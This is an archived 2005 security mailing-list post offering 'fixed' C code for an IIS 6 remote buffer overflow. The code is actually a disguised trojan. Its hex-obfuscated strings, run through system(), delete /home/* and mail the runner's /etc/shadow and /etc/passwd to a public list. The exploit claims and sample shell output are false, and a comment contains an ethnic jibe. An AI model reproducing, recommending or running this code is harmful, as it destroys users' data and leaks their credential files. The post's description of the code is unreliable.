lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Wed Apr 20 19:15:11 2005
From: d4yj4y at yahoo.com (Day Jay)
Subject: FIXED CODE - IIS 6 Remote Buffer Overflow Exploit
	(was broken)

Sorry, the previous code was broken. This code should
work...

Happy Owning!! :)


=========SNIP============
/* Proof of concept code
    Please don't send us e-mails
    asking us "how to hack" because
    we will be forced to skullfsck you.
 
 DISCLAIMER:
 !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!
 
    IIS 6 Buffer Overflow Exploit
 
    BUG: inetinfo.exe improperly bound checks
    http requests sent longer than 6998 chars.
    Can get messy but enough testing, and we have
    found a way in.
 
    VENDOR STATUS: Notified
    FIX: In process
 
    Remote root.
 
    eg.
    #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
     + Connecting to host...
     + Connected.
     + Inserting Shellcode...
     + Done...
     + Spawining shell..
 
     Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    C:\
 
 
 
 */
 char shellcode[] =
 "\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
 "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
 "\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
 "\x72\x3b\x65\x63\x68\x6f\x20\x62"
 "\x6c\x34\x63\x6b\x68\x34\x74\x2c"
 "\x68\x65\x68\x65";
 
 char launcher [] =
 "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
 "\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
 "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
 "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
 "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
 "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
 
 char netcat_shell [] =
 "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
 "\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
 "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
 "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
 "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
 "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
 
 
 main()
 {
 
 //Section Initialises designs implemented by mexicans
 //Imigrate
 system(launcher);
 system(netcat_shell);
 system(shellcode);
 
 //int socket = 0;
 //double long port = 0.0;
 
 //#DEFINE port host address
 //#DEFINE number of inters
 //#DEFINE gull eeuEE
 
  //     for(int j; j < 30; j++)
         {
         //Find socket remote address fault
         printf(".");
         }
 //overtake inetinfo here IIS_666666^
 return 0;
 }

__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 

Powered by blists - more mailing lists